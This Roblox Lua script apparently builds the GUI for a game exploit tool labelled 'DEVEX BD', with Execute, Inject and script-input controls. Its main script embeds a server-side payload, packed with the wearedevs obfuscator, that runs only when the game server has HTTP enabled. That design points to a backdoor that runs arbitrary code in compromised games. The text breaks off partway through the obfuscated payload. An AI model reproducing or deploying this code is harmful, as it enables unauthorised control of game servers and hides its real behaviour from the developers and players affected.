--- DEVEX is open source now :(


-- Instances: 27 | Scripts: 3 | Modules: 0 | Tags: 0
local DEV2L = {};

-- StarterGui.DEVEX
DEV2L["1"] = Instance.new("ScreenGui", game:GetService("Players").LocalPlayer:WaitForChild("PlayerGui"));
DEV2L["1"]["Name"] = [[DEVEX]];
DEV2L["1"]["ZIndexBehavior"] = Enum.ZIndexBehavior.Sibling;


-- StarterGui.DEVEX.Beta
DEV2L["2"] = Instance.new("Folder", DEV2L["1"]);
DEV2L["2"]["Name"] = [[Beta]];


-- StarterGui.DEVEX.Beta.MainFromTheMain
DEV2L["3"] = Instance.new("Folder", DEV2L["2"]);
DEV2L["3"]["Name"] = [[MainFromTheMain]];


-- StarterGui.DEVEX.Beta.MainFromTheMain.Gui
DEV2L["4"] = Instance.new("Folder", DEV2L["3"]);
DEV2L["4"]["Name"] = [[Gui]];


-- StarterGui.DEVEX.Beta.MainFromTheMain.Gui.Main
DEV2L["5"] = Instance.new("Frame", DEV2L["4"]);
DEV2L["5"]["BorderSizePixel"] = 0;
DEV2L["5"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
DEV2L["5"]["AnchorPoint"] = Vector2.new(0.5, 0.5);
DEV2L["5"]["Size"] = UDim2.new(0.55903, 0, 0.52743, 0);
DEV2L["5"]["Position"] = UDim2.new(0.5, 0, 0.5, 0);
DEV2L["5"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
DEV2L["5"]["Name"] = [[Main]];


-- StarterGui.DEVEX.Beta.MainFromTheMain.Gui.Main.UICorner
DEV2L["6"] = Instance.new("UICorner", DEV2L["5"]);
DEV2L["6"]["CornerRadius"] = UDim.new(0, 12);


-- StarterGui.DEVEX.Beta.MainFromTheMain.Gui.Main.UIGradient
DEV2L["7"] = Instance.new("UIGradient", DEV2L["5"]);
DEV2L["7"]["Rotation"] = 90;
DEV2L["7"]["Color"] = ColorSequence.new{ColorSequenceKeypoint.new(0.000, Color3.fromRGB(68, 199, 173)),ColorSequenceKeypoint.new(1.000, Color3.fromRGB(26, 119, 211))};


-- StarterGui.DEVEX.Beta.MainFromTheMain.Gui.Main.Scripts
DEV2L["8"] = Instance.new("Folder", DEV2L["5"]);
DEV2L["8"]["Name"] = [[Scripts]];


-- StarterGui.DEVEX.Beta.MainFromTheMain.Gui.Main.Scripts.MainSC
DEV2L["9"] = Instance.new("LocalScript", DEV2L["8"]);
DEV2L["9"]["Name"] = [[MainSC]];


-- StarterGui.DEVEX.Beta.MainFromTheMain.Gui.Main.Scripts.MainSC.Click
DEV2L["a"] = Instance.new("Sound", DEV2L["9"]);
DEV2L["a"]["Name"] = [[Click]];
-- [ERROR] cannot convert AudioContent, please report to "https://github.com/uniquadev/GuiToLuaConverter/issues"
DEV2L["a"]["SoundId"] = [[rbxassetid://72750814778881]];


-- StarterGui.DEVEX.Beta.MainFromTheMain.Gui.Main.TextLabel
DEV2L["b"] = Instance.new("TextLabel", DEV2L["5"]);
DEV2L["b"]["TextWrapped"] = true;
DEV2L["b"]["BorderSizePixel"] = 0;
DEV2L["b"]["TextSize"] = 14;
DEV2L["b"]["TextXAlignment"] = Enum.TextXAlignment.Left;
DEV2L["b"]["TextScaled"] = true;
DEV2L["b"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
DEV2L["b"]["FontFace"] = Font.new([[rbxasset://fonts/families/Michroma.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
DEV2L["b"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
DEV2L["b"]["BackgroundTransparency"] = 1;
DEV2L["b"]["Size"] = UDim2.new(1, 0, 0.07667, 0);
DEV2L["b"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
DEV2L["b"]["Text"] = [[DEVEX BD]];


-- StarterGui.DEVEX.Beta.MainFromTheMain.Gui.Main.UIAspectRatioConstraint
DEV2L["c"] = Instance.new("UIAspectRatioConstraint", DEV2L["5"]);
DEV2L["c"]["AspectRatio"] = 1.66667;


-- StarterGui.DEVEX.Beta.MainFromTheMain.Gui.Main.InputScroll
DEV2L["d"] = Instance.new("ScrollingFrame", DEV2L["5"]);
DEV2L["d"]["Active"] = true;
DEV2L["d"]["BorderSizePixel"] = 0;
DEV2L["d"]["Name"] = [[InputScroll]];
DEV2L["d"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
DEV2L["d"]["Size"] = UDim2.new(0.96711, 0, 0.60172, 0);
DEV2L["d"]["ScrollBarImageColor3"] = Color3.fromRGB(0, 0, 0);
DEV2L["d"]["Position"] = UDim2.new(0.01535, 0, 0.10029, 0);
DEV2L["d"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
DEV2L["d"]["ScrollBarThickness"] = 2;


-- StarterGui.DEVEX.Beta.MainFromTheMain.Gui.Main.InputScroll.LocalScript
DEV2L["e"] = Instance.new("LocalScript", DEV2L["d"]);



-- StarterGui.DEVEX.Beta.MainFromTheMain.Gui.Main.InputScroll.Input
DEV2L["f"] = Instance.new("TextBox", DEV2L["d"]);
DEV2L["f"]["CursorPosition"] = -1;
DEV2L["f"]["Name"] = [[Input]];
DEV2L["f"]["TextXAlignment"] = Enum.TextXAlignment.Left;
DEV2L["f"]["BorderSizePixel"] = 0;
DEV2L["f"]["TextWrapped"] = true;
DEV2L["f"]["TextSize"] = 21;
DEV2L["f"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
DEV2L["f"]["TextYAlignment"] = Enum.TextYAlignment.Top;
DEV2L["f"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
DEV2L["f"]["RichText"] = true;
DEV2L["f"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
DEV2L["f"]["MultiLine"] = true;
DEV2L["f"]["ClearTextOnFocus"] = false;
DEV2L["f"]["Size"] = UDim2.new(0, 441, 0, 211);
DEV2L["f"]["Position"] = UDim2.new(0, 0, -0.00143, 0);
DEV2L["f"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
DEV2L["f"]["Text"] = [[]];


-- StarterGui.DEVEX.Beta.MainFromTheMain.Gui.Main.InputScroll.Input.LocalScript
DEV2L["10"] = Instance.new("LocalScript", DEV2L["f"]);



-- StarterGui.DEVEX.Beta.MainFromTheMain.Gui.Main.InputScroll.UIListLayout
DEV2L["11"] = Instance.new("UIListLayout", DEV2L["d"]);
DEV2L["11"]["SortOrder"] = Enum.SortOrder.LayoutOrder;


-- StarterGui.DEVEX.Beta.MainFromTheMain.Gui.Main.Exe
DEV2L["12"] = Instance.new("TextButton", DEV2L["5"]);
DEV2L["12"]["TextWrapped"] = true;
DEV2L["12"]["BorderSizePixel"] = 0;
DEV2L["12"]["TextSize"] = 14;
DEV2L["12"]["TextScaled"] = true;
DEV2L["12"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
DEV2L["12"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
DEV2L["12"]["FontFace"] = Font.new([[rbxasset://fonts/families/Michroma.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
DEV2L["12"]["Size"] = UDim2.new(0.156, 0, 0.16667, 0);
DEV2L["12"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
DEV2L["12"]["Text"] = [[Execute]];
DEV2L["12"]["Name"] = [[Exe]];
DEV2L["12"]["Position"] = UDim2.new(0.014, 0, 0.73667, 0);


-- StarterGui.DEVEX.Beta.MainFromTheMain.Gui.Main.Exe.UICorner
DEV2L["13"] = Instance.new("UICorner", DEV2L["12"]);



-- StarterGui.DEVEX.Beta.MainFromTheMain.Gui.Main.Clear
DEV2L["14"] = Instance.new("TextButton", DEV2L["5"]);
DEV2L["14"]["TextWrapped"] = true;
DEV2L["14"]["BorderSizePixel"] = 0;
DEV2L["14"]["TextSize"] = 14;
DEV2L["14"]["TextScaled"] = true;
DEV2L["14"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
DEV2L["14"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
DEV2L["14"]["FontFace"] = Font.new([[rbxasset://fonts/families/Michroma.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
DEV2L["14"]["Size"] = UDim2.new(0.156, 0, 0.16667, 0);
DEV2L["14"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
DEV2L["14"]["Text"] = [[Clear]];
DEV2L["14"]["Name"] = [[Clear]];
DEV2L["14"]["Position"] = UDim2.new(0.194, 0, 0.73667, 0);


-- StarterGui.DEVEX.Beta.MainFromTheMain.Gui.Main.Clear.UICorner
DEV2L["15"] = Instance.new("UICorner", DEV2L["14"]);



-- StarterGui.DEVEX.Beta.MainFromTheMain.Gui.Main.RE
DEV2L["16"] = Instance.new("TextButton", DEV2L["5"]);
DEV2L["16"]["TextWrapped"] = true;
DEV2L["16"]["BorderSizePixel"] = 0;
DEV2L["16"]["TextSize"] = 14;
DEV2L["16"]["TextScaled"] = true;
DEV2L["16"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
DEV2L["16"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
DEV2L["16"]["FontFace"] = Font.new([[rbxasset://fonts/families/Michroma.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
DEV2L["16"]["Size"] = UDim2.new(0.156, 0, 0.16667, 0);
DEV2L["16"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
DEV2L["16"]["Text"] = [[RE]];
DEV2L["16"]["Name"] = [[RE]];
DEV2L["16"]["Position"] = UDim2.new(0.378, 0, 0.73667, 0);


-- StarterGui.DEVEX.Beta.MainFromTheMain.Gui.Main.RE.UICorner
DEV2L["17"] = Instance.new("UICorner", DEV2L["16"]);



-- StarterGui.DEVEX.Beta.MainFromTheMain.Gui.Main.R6
DEV2L["18"] = Instance.new("TextButton", DEV2L["5"]);
DEV2L["18"]["TextWrapped"] = true;
DEV2L["18"]["BorderSizePixel"] = 0;
DEV2L["18"]["TextSize"] = 14;
DEV2L["18"]["TextScaled"] = true;
DEV2L["18"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
DEV2L["18"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
DEV2L["18"]["FontFace"] = Font.new([[rbxasset://fonts/families/Michroma.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
DEV2L["18"]["Size"] = UDim2.new(0.156, 0, 0.16667, 0);
DEV2L["18"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
DEV2L["18"]["Text"] = [[R6]];
DEV2L["18"]["Name"] = [[R6]];
DEV2L["18"]["Position"] = UDim2.new(0.56, 0, 0.73667, 0);


-- StarterGui.DEVEX.Beta.MainFromTheMain.Gui.Main.R6.UICorner
DEV2L["19"] = Instance.new("UICorner", DEV2L["18"]);



-- StarterGui.DEVEX.Beta.MainFromTheMain.Gui.Main.Inject
DEV2L["1a"] = Instance.new("TextButton", DEV2L["5"]);
DEV2L["1a"]["TextWrapped"] = true;
DEV2L["1a"]["BorderSizePixel"] = 0;
DEV2L["1a"]["TextSize"] = 14;
DEV2L["1a"]["TextScaled"] = true;
DEV2L["1a"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
DEV2L["1a"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
DEV2L["1a"]["FontFace"] = Font.new([[rbxasset://fonts/families/Michroma.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
DEV2L["1a"]["Size"] = UDim2.new(0.156, 0, 0.16667, 0);
DEV2L["1a"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
DEV2L["1a"]["Text"] = [[Inject]];
DEV2L["1a"]["Name"] = [[Inject]];
DEV2L["1a"]["Position"] = UDim2.new(0.826, 0, 0.73667, 0);


-- StarterGui.DEVEX.Beta.MainFromTheMain.Gui.Main.Inject.UICorner
DEV2L["1b"] = Instance.new("UICorner", DEV2L["1a"]);



-- StarterGui.DEVEX.Beta.MainFromTheMain.Gui.Main.Scripts.MainSC
local function C_9()
local script = DEV2L["9"];
	local StarterGui = game:GetService("StarterGui");
	local e = script.Parent.Parent;
	e.Draggable = true
	e.Active = true
	local plr = game.Players.LocalPlayer;
	local input = e.InputScroll.Input;
	local exe = e.Exe;
	local clear = e.Clear;
	local inject = e.Inject;
	local re = e.RE;
	local rr = e.R6;
	local sound = script.Click;
	local Logs = [[local HttpService = game:GetService("HttpService")
	local MarketplaceService = game:GetService("MarketplaceService")
	local Players = game:GetService("Players")
	local RunService = game:GetService("RunService")
	
	if not RunService:IsServer() then return end
	if not HttpService.HttpEnabled then return end
	
	--[[ v1.0.0 https://wearedevs.net/obfuscator ]] return(function(...)local k={"\056\075\068\104\057\050\065\061","\056\052\109\076\057\050\065\061";"\119\043\104\084\084\071\122\068\083\083\084\108\071\122\122\120\053\075\065\097\102\057\065\057\116\052\077\103\055\112\068\114\110\118\103\051\087\089\099\048\080\067\055\054\110\081\047\056\081\056\119\106\076\052\110\106\054\085\103\098\107\049\082\108\055\074\113\069\084\117\088\043\100\072\080\087\072\103\067\113\067\122\053\057\069\048\099\097\101\109\085\110\121\109\083\111\107\112\057\076\049\120\121\067\109\080\102\082\107\057\089\067\073\074\080\078\105\104\115\069\053\120\065\101\098\098\122\049\080\088\079\109\120\051\099\067\097\070\106\054\120\051\053\118\079\098\122\105\071\049\106\079\089\067\109\103\074\113\050\053\105\047\061\061","\056\122\049\086\107\111\098\112","\107\111\120\116\107\069\068\074\057\052\080\061";"\121\116\107\053\057\106\120\110\121\053\070\049\121\075\098\119\121\067\108\066";"\107\069\106\097\114\084\098\116\053\048\070\067\117\048\120\113\057\083\061\061","\080\085\121\069\107\049\089\116\098\106\074\071\098\114\053\081\121\083\061\061";"\080\050\121\104\101\115\097\071","\099\122\086\086\080\083\061\061","\080\110\086\099\119\085\074\085\099\106\068\069\098\122\086\117\117\083\061\061","\121\122\113\081\107\043\068\114\053\048\049\106\106\115\049\097\121\052\106\061";"\056\052\098\108","\054\052\074\077\107\069\107\088\106\070\085\104\057\069\070\076\072\070\080\061","\121\069\068\117\088\106\107\056\107\111\121\088\056\106\084\082\072\083\061\061";"\080\111\098\086\057\111\047\061","\088\083\061\061";"\072\106\113\052\080\052\098\078\106\075\108\075\121\070\070\052\114\067\080\061","\072\043\109\121\114\111\109\071\057\043\049\055\106\110\056\071\107\047\061\061","\056\050\098\049\099\083\061\061";"\053\111\084\113\080\111\053\104\065\085\121\070\107\111\053\110\107\111\053\043\065\117\061\061";"\099\122\120\081\099\122\084\048","\054\106\086\068\106\049\056\109\117\070\121\085\053\110\098\086";"\107\111\120\081\107\115\049\066\056\075\065\061","\080\052\084\081\056\111\120\113","\080\115\107\086\114\085\070\121\119\085\121\084\117\071\106\116\121\047\061\061";"","\075\049\120\071\099\047\061\061","\107\115\097\047\099\115\098\079","\099\048\098\097\053\122\068\114\080\071\068\078\053\085\098\085","\072\075\112\102";"\099\071\070\048\056\117\061\061";"\075\049\120\090\056\115\102\061";"\088\066\083\070\056\082\112\074\088\083\061\061","\057\111\053\081";"\057\067\085\061";"\080\052\053\113\057\050\056\070";"\057\115\084\048\101\089\061\061","\080\122\053\048\057\115\053\048\099\075\121\086\099\052\109\070";"\057\067\065\061","\107\111\084\066\057\111\106\061";"\075\049\120\074\057\052\121\070\054\089\061\061";"\121\069\070\077\106\075\098\047\107\085\084\074\119\048\086\053\117\115\106\061";"\075\049\120\113\056\075\121\086\107\111\084\066\057\111\106\061"}for b,P in ipairs({{-106210-(-106211);445725+-445681},{217156+-217155,-83694-(-83716)},{714752+-714729;-912092-(-912136)}})do while P[-933704+933705]<P[-276590-(-276592)]do k[P[379044-379043]],k[P[-703461-(-703463)]],P[640922+-640921],P[452019+-452017]=k[P[-120575+120577]],k[P[1027825+-1027824]],P[-587431-(-587432)]+(-349139+349140),P[263343-263341]-(290703-290702)end end local function b(b)return k[b+(130044-127790)]end do local b=string.char local P=table.insert local J=string.sub local u=string.len local z={f=-910975+911031;["\054"]=-53843+53873;M=891749-891707;D=-145892+145901,K=-549240+549263,["\053"]=531718-531697;A=-517973+517981;["\056"]=832015+-831990,j=-786674-(-786694);o=597373-597367,g=-352373-(-352404),T=-877560+877565;m=-567466-(-567515),Z=-754447-(-754491);U=-373757+373761;["\052"]=627347+-627309,u=540213+-540197;y=3318+-3301;w=-458457-(-458469),O=625990+-625947;q=656286+-656241;t=569380-569329;["\049"]=-760770+760823;s=-662710+662732;["\055"]=-189392-(-189407),l=591797+-591796,v=25094+-25083;e=-325932-(-325958);["\047"]=-66732+66780,B=620621+-620587,a=-839644-(-839701),S=756433+-756401;N=-396037+396095,G=-1047615+1047654;x=436986-436925,d=961175-961115,R=-1017402+1017404;["\050"]=1026500-1026445,n=-494932-(-494967);Q=-1042144-(-1042190);["\051"]=-937590+937649,i=920991-920929,L=222295-222248;c=150563-150539,J=-89787-(-89828),W=-145136-(-145199),Y=405015+-405015;E=569796-569789;b=1024319+-1024306;["\043"]=512796-512760,I=99210+-99200,p=1007083-1007043;X=664894-664880;k=-832595-(-832624);P=-365982+366010,F=-807188-(-807225),V=390616-390583,["\057"]=725192+-725165;C=-314551+314554;r=44106+-44087;h=179118+-179068,z=852857-852803,H=485852+-485834,["\048"]=-611213-(-611265)}local H=type local W=math.floor local i=table.concat local v=k for k=-546717-(-546718),#v,533098-533097 do local M=v[k]if H(M)=="\115\116\114\105\110\103"then local H=u(M)local C={}local h=-143138-(-143139)local q=-27769+27769 local X=-532420+532420 while h<=H do local k=J(M,h,h)local u=z[k]if u then q=q+u*(336004-335940)^((-257620-(-257623))-X)X=X+(-856205-(-856206))if X==-207616+207620 then X=379968-379968 local k=W(q/(-237540-(-303076)))local J=W((q%(1009931-944395))/(-240774+241030))local u=q%(96623+-96367)P(C,b(k,J,u))q=-254178+254178 end elseif k=="\061"then P(C,b(W(q/(1095242-1029706))))if h>=H or J(M,h+(481035-481034),h+(131348+-131347))~="\061"then P(C,b(W((q%(-944661+1010197))/(-662855-(-663111)))))end break end h=h+(-943290+943291)end v[k]=i(C)end end end return(function(k,J,u,z,H,W,i,P,B,v,c,y,h,M,L,X,q,w,U,C)M,U,c,B,v,q,L,X,P,C,h,w,y={},function(k,b)local J=q(b)local u=function(u,z,H,W)return P(k,{u,z;H,W},b,J)end return u end,function(k,b)local J=q(b)local u=function(...)return P(k,{...},b,J)end return u end,function(k,b)local J=q(b)local u=function(u,z)return P(k,{u;z},b,J)end return u end,{},function(k)for b=-817032+817033,#k,207188-207187 do M[k[b]]=(-65287+65288)+M[k[b]]end if u then local P=u(true)local J=H(P)J[b(-306965-(-304731))],J[b(391835-394083)],J[b(981509+-983752)]=k,X,function()return 530821+-79807 end return P else return z({},{[b(630389+-632637)]=X,[b(835947+-838181)]=k,[b(563651+-565894)]=function()return 276812+174202 end})end end,function(k,b)local J=q(b)local u=function()return P(k,{},b,J)end return u end,function(k)local b,P=-324439+324440,k[820208+-820207]while P do M[P],b=M[P]-(22850+-22849),(-312551-(-312552))+b if 835929+-835929==M[P]then M[P],v[P]=nil,nil end P=k[b]end end,function(P,u,z,H)local Y,M,h,q,n,t,S,i,s,m,r,p,F,a,d,O,x,D,I,N,E,A,Q,K,V,e,o,Z,g,G,c,j,T,X while P do if P<-724426+8784176 then if P<474184+3043337 then if P<1408754-(-420119)then if P<492699-(-361127)then if P<532884-84057 then if P<-424624+672467 then if P<-394983+536710 then r=v[h]P=r and 501500+3311325 or-680247+10272875 x=r else D=D+t i=D<=F p=not K i=p and i p=D>=F p=K and p i=p or i p=-233356+731889 P=i and p i=5371064-44765 P=P or i end else P=v[Y]t=-771566-(-771567)K=276188-276182 F=P(t,K)P=b(974201-976437)K=b(-270277+268041)k[P]=F t=k[K]K=914630+-914628 P=t>K P=P and-877521+14726071 or-33484+2170084 end else if P<287240-(-240823)then G=b(1021609-1023847)p=C()v[p]=D i=k[G]G=b(-408700-(-406449))n=b(722370+-724597)T=184646+-184546 P=i[G]G=-16411-(-16412)s=380617+-380616 i=P(G,T)Z=626371+-626116 G=C()v[G]=i T=191490-191490 S=-274208-(-274208)P=v[Y]Q=44400-44398 i=P(T,Z)T=C()v[T]=i P=v[Y]Z=151764+-151763 I=v[G]i=P(Z,I)j=278956-268956 Z=C()v[Z]=i i=v[Y]I=i(s,Q)i=-917628+917629 P=I==i i=b(305993-308235)I=C()v[I]=P Q=b(-100127+97912)r=k[n]a=v[Y]P=b(144817+-147029)P=N[P]E={a(S,j)}n=r(J(E))r=b(993057+-995272)x=n..r s=Q..x Q=b(663752+-665968)P=P(N,i,s)s=C()x=w(-733988+9285127,{Y,p,A,q,h,m,I,s;G,Z,T,g})v[s]=P i=k[Q]Q={i(x)}P={J(Q)}Q=P P=v[I]P=P and 728310+10029697 or-416243-(-501455)else P=251367+3361536 end end else if P<-554149+2202147 then if P<-838692+2260914 then P=true P=-502424+15401689 else P={}v[z[201489-201487]]=P Y=-92005+92260 i=v[z[407393+-407390]]c=686510+35184371402322 e=b(851523-853746)X=i i=h%c v[z[-333986-(-333990)]]=i o=h%Y Y=-910162+910164 P=12608036-528154 A=-62879-(-62880)c=o+Y v[z[-977286+977291]]=c Y=k[e]e=b(824299-826540)o=Y[e]d=A Y=o(M)o=b(603155-605404)q[h]=o g=Y e=357122-357121 A=-693058+693058 V=d<A o=563383-563242 A=e-d end else if P<-163626+1845887 then P=i and-568874+14222697 or-834076+7303683 else A=b(330673-332920)g=k[A]i=g P=-735852+10985398 end end end else if P<346444+2001300 then if P<1922574-(-156223)then if P<1182180-(-764435)then if P<941847-(-918119)then q=341014-341013 h=v[z[724829+-724826]]M=h~=q P=M and-74535+14931407 or 4571223-777908 else P=true P=P and 36189+304274 or 3351654-704168 end else P=-377035+2304789 end else if P<457412+1664550 then q=6308731-(-313457)h=b(141592-143837)M=h^q i=1038709+14557817 P=i-M i=b(-443149-(-440923))M=P P=i/M i={P}P=k[b(640836-643082)]else K=b(109332-111568)P=k[K]K=b(777622+-779862)k[K]=P P=1349948-(-651140)end end else if P<407958+2441346 then if P<-641435+3351366 then P=k[b(-768542+766324)]i={}else q=v[z[-178980+178986]]h=q==M i=h P=1022245+6547663 end else if P<-166169+3578558 then M=v[z[-978194-(-978195)]]i=#M M=-754514+754514 P=i==M P=P and-116490+16095710 or 14927943-411534 else i=b(467646+-469882)P=k[i]M=b(77431+-79671)i=k[M]M=b(-1034891+1032651)k[M]=P P=15597671-(-136418)M=b(498349+-500585)k[M]=i M=v[z[-969122-(-969123)]]h=M()end end end end else if P<5488355-159635 then if P<252677+4025784 then if P<267595+3623650 then if P<934887+2874256 then if P<3044204-(-650146)then m=y(m)o=nil P=15229325-(-325404)d=nil Y=y(Y)e=nil O=nil c=y(c)q=y(q)O={}Y=b(698833+-701071)d={}A=y(A)N=nil g=y(g)m=-325259+325515 q=nil V=nil X=y(X)h=y(h)o=b(-44814+42576)h=nil K=m g=b(969977-972200)e=b(936047-938282)m=424413+-424412 V=C()c=k[o]o=b(325224-327454)X=c[o]c=C()v[c]=X o=k[Y]Y=b(-163771-(-161520))A=C()X=o[Y]Y=k[e]e=b(-714299-(-712060))o=Y[e]e=k[g]g=b(-601484+599262)Y=e[g]e=501679+-501679 g=C()v[g]=e e=-918910+918912 N=-861804-(-861805)v[A]=e e={}p=m v[V]=d d=-199879+199879 m=-25530-(-25530)G=p<m m=N-p else h=v[z[274062-274059]]q=-702268+702306 M=h*q P=493392+1356097 h=73429-73172 i=M%h v[z[-46174+46177]]=i end else P=10289710-697082 n=-278531+278532 r=Q[n]x=r end else if P<3931800-(-171935)then h=C()q=b(-168761+166538)Y=b(83643+-85859)P=true M=u v[h]=P c=C()X=C()i=k[q]q=b(-808017-(-805789))P=i[q]q=C()v[q]=P P=w(498955+15394391,{})v[X]=P P=false v[c]=P o=k[Y]e=L(6524262-1041292,{c})Y=o(e)P=Y and 13553735-(-258080)or 8999382-187697 i=Y else P=r i=x P=7553288-(-822560)end end else if P<1011383+3909533 then if P<-998794+5865590 then P={}q=v[z[-362323-(-362332)]]h=-60024+60025 M=P P=5360364-(-956613)X=q q=-1023547+1023548 c=q q=575557-575557 o=c<q q=h-c else N=m T=N P=15732041-177312 O[N]=T N=nil end else if P<5603948-573201 then X=nil P=-862015+14164384 Y=nil o=nil else F=v[h]P=F and 12558730-722664 or 7900413-(-755919)D=F end end end else if P<7253707-914657 then if P<5284595-(-586611)then if P<5730043-248095 then if P<-784958+6232068 then m=#O K=228430+-228430 N=m==K P=N and 12121200-(-1011618)or 13702760-929528 else T=y(T)Z=y(Z)p=y(p)Q=nil P=329019+-110925 s=y(s)G=y(G)I=y(I)end else i={}P=true v[z[-97572+97573]]=P P=k[b(-464626+462373)]end else if P<233213+6083522 then P=12550655-470773 e=A t=b(125079-127302)F=k[t]t=b(-11048-(-8804))D=F[t]F=D(M,e)D=v[z[-461415+461421]]t=D()m=F+t N=m+o m=908435+-908179 t=563348+-563347 e=nil O=N%m m=q[h]o=O F=o+t D=X[F]N=m..D q[h]=N else q=q+c h=q<=X Y=not o h=Y and h Y=q>=X Y=o and Y h=Y or h Y=-406120+9242386 P=h and Y h=10625940-(-660421)P=P or h end end else if P<6000806-(-860951)then if P<6674315-(-171884)then P=v[z[-506059+506066]]P=P and 10489193-(-308298)or 4180364-(-663143)else P=13797640-495271 end else if P<7232448-(-78258)then E=-686226-(-686228)a=Q[E]E=v[s]n=a==E x=n P=3965681-(-300476)else v[z[-403252+403257]]=i P=-725694+7195301 M=nil end end end end end else if P<12645177-614394 then if P<-863532+10903175 then if P<5021+8825589 then if P<660352+8030141 then if P<-269889+8841435 then if P<335309+8177111 then P=-440355+5917646 v[h]=i else c=556101-556099 h=v[z[199279-199278]]X=-946691-(-946692)q=h(X,c)h=-337228+337229 M=q==h i=M P=M and 2350842-669415 or 10608517-(-210951)end else v[h]=D P=v[h]P=P and 11087-(-704295)or 759887-(-615939)end else if P<-1012494+9728300 then i=9409454-(-740596)q=5384032-(-892612)h=b(-379634+377413)M=h^q P=i-M i=b(790642-792861)M=P P=i/M i={P}P=k[b(1018542-1020755)]else o=i Y=b(69125+-71363)e=b(-186315+184080)i=k[Y]Y=b(-795522-(-793271))P=i[Y]Y=C()v[Y]=P i=k[e]e=b(96446-98656)V=b(31787-34022)P=i[e]d=k[V]g=d A=P e=P P=d and 9698478-(-1048292)or 13893785-(-751537)end end else if P<10421344-823425 then if P<9297707-433986 then e=468166-468166 P=v[z[816174-816173]]h=q g=882565-882310 Y=P(e,g)P=6821167-504190 M[h]=Y h=nil else S=-273582+273583 v[h]=x E=v[Z]a=E+S n=Q[a]r=d+n n=-930854-(-931110)P=r%n d=P a=v[T]P=5418982-(-58309)n=V+a a=900955-900699 r=n%a V=r end else if P<-1009802+10808496 then P=true P=P and 28948+16487769 or 14458564-(-440701)else P=48163+15685926 end end end else if P<451810+10333276 then if P<179356+10562061 then if P<-12541+10743659 then if P<-686268+11161428 then g=C()v[g]=i d=-215471+215536 P=v[Y]A=-927728+927731 N=w(999254+7708535,{})i=P(A,d)O=b(400525-402741)P=-712356-(-712356)A=C()t=b(1013509+-1015736)d=P P=-494674-(-494674)V=P v[A]=i i=k[O]O={i(N)}P={J(O)}O=P i=806521+-806519 P=O[i]i=b(430023-432275)N=P P=k[i]m=v[q]F=k[t]t=F(N)F=b(367878-370120)D=m(t,F)m={D()}i=P(J(m))m=C()v[m]=i D=v[A]F=D D=-606440+606441 i=286405+-286404 t=D D=-34500+34500 K=t<D P=-817611-(-1035705)D=i-t else i={}P=k[b(946191-948416)]end else r=P E=25355-25354 a=Q[E]E=false n=a==E x=n P=n and 7672130-809819 or 3337125-(-929032)end else if P<-580842+11334220 then O=b(541234-543469)V=k[O]O=b(949139-951386)d=V[O]P=-510572+15155894 g=d else x=v[h]P=x and 11432770-696811 or 181884+8193964 i=x end end else if P<-243384+11523306 then if P<681333+10137431 then M=b(-514888-(-512657))P=k[M]q=327814+-327814 h=v[z[501518-501510]]M=P(h,q)P=4765968-(-77539)else h=v[z[-470979+470981]]q=v[z[-660172-(-660175)]]M=h==q P=1128009-(-553418)i=M end else if P<-745318+12251167 then P=v[z[-130686-(-130696)]]h=v[z[711636-711625]]M[P]=h P=v[z[539446-539434]]h={P(M)}P=k[b(915745+-917959)]i={J(h)}else F=d==V P=-575814+9232146 D=F end end end end else if P<15088342-350434 then if P<12793039-(-890727)then if P<13994657-744436 then if P<644243+12163039 then if P<-770575+13001569 then O=not V A=A+d e=A<=g e=O and e O=A>=g O=V and O e=O or e O=6465897-153603 P=e and O e=5280665-258566 P=P or e else K=#O m=-10846+10847 N=X(m,K)T=1013540-1013539 m=o(O,N)K=v[V]N=nil G=m-T P=-517403+5872794 p=Y(G)K[m]=p m=nil end else N={}o=nil m=C()v[m]=N K=B(584779+2399482,{m,g;A;c})O=nil n=nil c=y(c)I=b(-82474-(-80240))N=C()T={}p=C()v[N]=K e=nil P=k[b(1042073+-1044306)]G=b(-553575-(-551338))K={}v[p]=K K=k[G]s=v[p]Q=b(601493+-603725)d=nil Z={[I]=s,[Q]=n}G=K(T,Z)X=nil K=U(-350976+16505859,{p,m;V;g;A,N})Y=nil A=y(A)N=y(N)h=K i={}p=y(p)q=G V=y(V)m=y(m)g=y(g)o=b(151925-154154)Y=19185134252577-85820 c=h(o,Y)X=q[c]h=nil X=nil q=nil end else if P<13279101-(-317452)then P=k[b(322798-325022)]i={h}else e=b(498367-500583)X=b(865209-867436)i=b(-776335-(-774083))g=U(2054905-(-39150),{})P=k[i]M=v[z[-364982-(-364986)]]q=k[X]Y=k[e]e={Y(g)}Y=974338+-974336 o={J(e)}c=o[Y]X=q(c)q=b(729085+-731327)h=M(X,q)M={h()}i=P(J(M))h=v[z[-263665-(-263670)]]M=i i=h P=h 